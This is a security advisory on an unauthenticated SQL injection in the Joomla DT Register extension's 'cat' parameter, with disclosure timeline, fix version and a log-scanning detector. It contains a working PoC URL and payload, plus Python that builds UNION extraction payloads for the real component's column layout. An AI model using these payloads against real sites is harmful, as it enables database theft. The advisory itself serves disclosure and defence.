
Joomla! Component DT Register - 'cat' SQL Injection

Title: SQL injection in Joomla extension DT Register
Credit: Elar Lang / https://security.elarlang.eu
Vulnerability: SQL injection
Vulnerable version: before 3.1.12 (Joomla 3.x) / 2.8.18 (Joomla 2.5)
CVE: pending
Full Disclosure URL: https://security.elarlang.eu/sql-injection-in-joomla-extension-dt-register.html
Vendor: DTH Development
Vendor URL: http://www.dthdevelopment.com/
Product: DT Register "Calendar & Event Registration"
Product URL: https://extensions.joomla.org/extension/dt-register
Product URL: http://www.dthdevelopment.com/joomla-components/dt-register-event-registration-for-joomla.html

# Background

"DT Register is the Joomla Event Registration component that gives you
functionality beyond what any other event booking solution can offer"
(https://extensions.joomla.org/extension/dt-register)

# Vulnerability

SQL injection in the Joomla extension "DT Register" by DTH Development
allows a remote, unauthenticated attacker to inject arbitrary SQL into
the events query via the cat parameter (sent as the array element cat[0]).

# Preconditions

None: the vulnerable request requires neither authentication nor authorization.

# Proof-of-Concept

http://[DOMAIN]/[PATH]/index.php?controller=calendar&format=raw&cat[0]=SQLi&task=events

PoC value (lists all events, which exposes valid eventId values):

cat[0]=6) OR 1-- -

The closing parenthesis ends the expression the value is embedded in,
OR 1 makes the condition always true, and -- - comments out the
remainder of the query.

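A defender reading this advisory will want to know whether the PoC request above has already been tried against a site. The following Python is an added example, not code from the advisory or from DTH Development: it scans web-server access-log lines for requests to index.php with controller=calendar and task=events whose cat[...] value is anything other than a plain integer, which covers both the boolean PoC and UNION variants. The log lines are constructed in Apache combined format for this example, and the assumption that the request target appears as the path plus query string in the log is part of the example, not the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines in Apache combined format (not real traffic).
# Line 1 is a legitimate request, lines 2-3 carry injection attempts,
# line 4 is an unrelated Joomla request.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Dec/2016:10:01:02 +0000] "GET /index.php?controller=calendar&format=raw&cat[0]=6&task=events HTTP/1.1" 200 4312 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Dec/2016:10:01:09 +0000] "GET /index.php?controller=calendar&format=raw&cat%5B0%5D=6)%20OR%201--%20-&task=events HTTP/1.1" 200 98231 "-" "Mozilla/5.0"
198.51.100.2 - - [12/Dec/2016:10:02:30 +0000] "GET /index.php?controller=calendar&format=raw&cat[0]=6)%20UNION%20SELECT%201,2,3&task=events HTTP/1.1" 500 512 "-" "curl/7.50"
198.51.100.9 - - [12/Dec/2016:10:03:00 +0000] "GET /index.php?option=com_content&view=article&id=6 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Pulls the request target out of the quoted request line of a combined-format entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def suspicious_cat_values(line):
    """Return the cat[...] values of a DT Register calendar/events request
    that are not plain integers; [] for any other line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith("index.php"):
        return []
    # parse_qs percent-decodes names and values, so cat%5B0%5D and cat[0]
    # both arrive as the key "cat[0]".
    params = parse_qs(parts.query, keep_blank_values=True)
    if params.get("controller") != ["calendar"] or params.get("task") != ["events"]:
        return []
    hits = []
    for name, values in params.items():
        if name == "cat" or name.startswith("cat["):
            for value in values:
                value = unquote(value)  # catch double-encoded payloads as well
                if not value.isdigit():
                    hits.append(value)
    return hits


def scan_log(text):
    """Return [(client_ip, [offending cat values]), ...] for every suspicious entry."""
    findings = []
    for line in text.splitlines():
        values = suspicious_cat_values(line)
        if values:
            findings.append((line.split(" ", 1)[0], values))
    return findings


if __name__ == "__main__":
    for ip, values in scan_log(SAMPLE_LOG):
        print(ip, values)
```

The check keys on the parameter shape rather than on SQL keywords, so an attacker who avoids the strings OR and UNION is still flagged; the price is that a legitimate non-numeric category value, if the extension ever accepted one, would also be reported.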
## Using UNION

To read data out with UNION you need one valid eventId (found in the previous step).

The SELECT query has 112 columns in total; eventId is at position 13.
Position 112 is the best one to use for output.

Step-by-step instructions for reading the data out are in the blog post:
https://security.elarlang.eu/sql-injection-in-joomla-extension-dt-register.html

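The two PoC steps above (the boolean bypass that lists every event, and the UNION read-out that needs a valid eventId in column 13 and the result in column 112) are easier to follow against a runnable model. The Python below is an added example and not code from the advisory or from DT Register itself. It assumes, because the PoC value opens with a closing parenthesis, that the request value is concatenated into an IN (...) list; the toy SQLite schema, the column names, the users table and its constructed hash are all part of the example. The toy query has 4 columns with eventId at position 2 so the demo stays readable; build_union_payload defaults to the advisory's real numbers (112 columns, eventId at 13, output at 112) so it also produces the payload shape for the actual component.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the events data (example only)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE events (title TEXT, eventId INTEGER, category INTEGER, notes TEXT);
        INSERT INTO events VALUES ('Board meeting', 6, 1, 'public');
        INSERT INTO events VALUES ('Private workshop', 7, 2, 'unpublished');
        INSERT INTO events VALUES ('Staff retreat', 8, 3, 'internal');
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', '$2y$10$constructedhash');
    """)
    return db


def vulnerable_events(db, cat_value):
    """Hypothetical vulnerable pattern (assumption): the raw request value is
    concatenated into an IN (...) list, which is what the PoC's leading ')' implies."""
    sql = "SELECT title, eventId, category, notes FROM events WHERE category IN (%s)" % cat_value
    return db.execute(sql).fetchall()


def hardened_events(db, cat_values):
    """Hardened form: accept only integers and bind them as parameters."""
    ids = [int(v) for v in cat_values]  # raises ValueError on any non-numeric value
    placeholders = ",".join("?" * len(ids))
    sql = "SELECT title, eventId, category, notes FROM events WHERE category IN (%s)" % placeholders
    return db.execute(sql, ids).fetchall()


def hardened_rejects(db, cat_values):
    """True when the hardened path refuses the input."""
    try:
        hardened_events(db, cat_values)
        return False
    except ValueError:
        return True


def build_union_payload(event_id, expr, total_cols=112, id_pos=13, out_pos=112):
    """Build the cat[0] value for UNION-based extraction.

    A known valid eventId goes into the eventId column so the injected row is
    rendered like a real event; expr goes into the output column; every other
    column is NULL. '0)' closes the IN list so the original WHERE matches
    nothing, and '-- -' comments out the rest of the query. Defaults are the
    advisory's numbers for DT Register.
    """
    cols = ["NULL"] * total_cols
    cols[id_pos - 1] = str(int(event_id))
    cols[out_pos - 1] = expr
    return "0) UNION SELECT %s-- -" % ",".join(cols)


if __name__ == "__main__":
    db = make_db()
    print("boolean PoC lists every event:", vulnerable_events(db, "6) OR 1-- -"))
    toy = build_union_payload(6, "(SELECT username||':'||password FROM users)",
                              total_cols=4, id_pos=2, out_pos=4)
    print("UNION read-out on the toy schema:", vulnerable_events(db, toy))
    print("hardened path rejects the PoC:", hardened_rejects(db, ["6) OR 1-- -"]))
    print("payload for the real column layout:", build_union_payload(6, "@@version"))
```

Running it shows why the advisory insists on a known eventId: the row the UNION produces is only useful if the application renders it, and it renders it by that column. Against the real component the generated payload is URL-encoded into cat[0] of the PoC request; note that the expression for column 112 must match that column's type well enough for the template to print it.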
# Vulnerability Disclosure Timeline

Full communication is available in the blog post:
https://security.elarlang.eu/sql-injection-in-joomla-extension-dt-register.html

2016-10-17 | me > DTH | via web form - I would like to report some security holes. What is the correct way for that?
2016-10-18 | me > DTH | any response?
2016-10-25 | me > DTH | mail to dthdev@dthdevelopment.com
2016-10-25 | DTH > me |
* "you are not in our client list"
* "Our site (dthdevelopment.com) is protected by an enterprise grade firewall"
2016-10-25 | me > DTH | I'm a whitehat, technical details
2016-10-25 | DTH > me | description of what kind of serious problems I may face
2016-10-25 | me > DTH | explanations
2016-11-02 | me > DTH | hello?
2016-11-11 | me > DTH, SiteLock | Last call.
2016-11-11 | SiteLock / DTH / me | some communication
2016-11-12 | DTH > SiteLock (CC to me) | "It was configured to be open in the setup"
2016-11-15 | DTH | Released DT Register version 3.1.12 (J3.x) / 2.8.18 (J2.5)
2016-12-05 | DTH > me | "Sorry, forgot to respond on this. We closed the problem on our demo site."
2016-12-12 | me | Full Disclosure on security.elarlang.eu
2016-12-13 | me | Full Disclosure on the Full Disclosure mailing list on seclists.org

## Asking for a CVE from DWF (Distributed Weakness Filing Project) / http://iwantacve.org

2016-10-20 | me > DWF | CVE request
2016-10-31 | DWF > me | "CVE - Acceptance of MITRE Terms of Use for CVE Assignment"
2016-10-31 | me > DWF | I accept
2016-11-19 | me > DWF | Any feedback or decision? (still no response)
2016-12-11 | me > DWF | Is there any hope to get feedback? (still no response)

As I haven't got any feedback, you can take this post as a CVE request.

# Fix

Upgrade to DT Register 3.1.12 (Joomla 3.x) or 2.8.18 (Joomla 2.5).

--
Elar Lang
Blog @ https://security.elarlang.eu
Pentester, lecturer @ http://www.clarifiedsecurity.com